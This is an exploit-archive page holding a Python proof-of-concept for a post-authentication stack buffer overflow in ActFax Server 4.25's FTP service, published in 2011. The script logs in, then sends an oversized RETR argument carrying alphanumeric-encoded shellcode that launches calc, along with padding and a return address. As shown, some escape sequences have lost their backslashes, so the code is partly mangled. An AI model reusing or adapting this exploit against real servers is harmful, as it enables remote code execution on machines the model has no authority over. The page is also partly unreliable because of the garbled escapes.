ActFax Server FTP Remote BOF (post auth)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ActFax Server FTP Remote BOF (post auth)
# Published : 2011-02-16
# Author : chap0
# Previous Title : Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities
# Next Title : ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit

#!/usr/bin/python
# Exploit Title: ActFax Server FTP Remote BOF (post auth)
# Date: Feb 15, 2011
# Author: chap0
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Version: Version 4.25, Build 0221 (2010-02-11)
# Tested on: Windows XP SP3 en
# Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT
# Stay true my friends

import socket

print "nActFax Server FTP Remote BOF"
print " chap0 - www.seek-truth.net n"

# pops calc
calccode = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkXlqELKZL587Pep7PdoaxsSSQbLPcLMw5JXbpX8KwOcHBPwkON0A"

# push ebp #pop eax #sub eax,55555521 * 3 :)
junk = "x55x58x2Dx21x55x55x55x2Dx21x55x55x55x2Dx21x55x55x55" + "C"*135 + calccode + "A"*(616-len(calccode))

payload = junk + "x37x27x40x00" #RETN

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.2',21))
s.recv(1024)
s.send('USER ' + 'chaporn')
print (s.recv(1024))
s.send('PASS chaporn')
print (s.recv(1024))
s.send('RETR ' + payload + 'rn')
s.close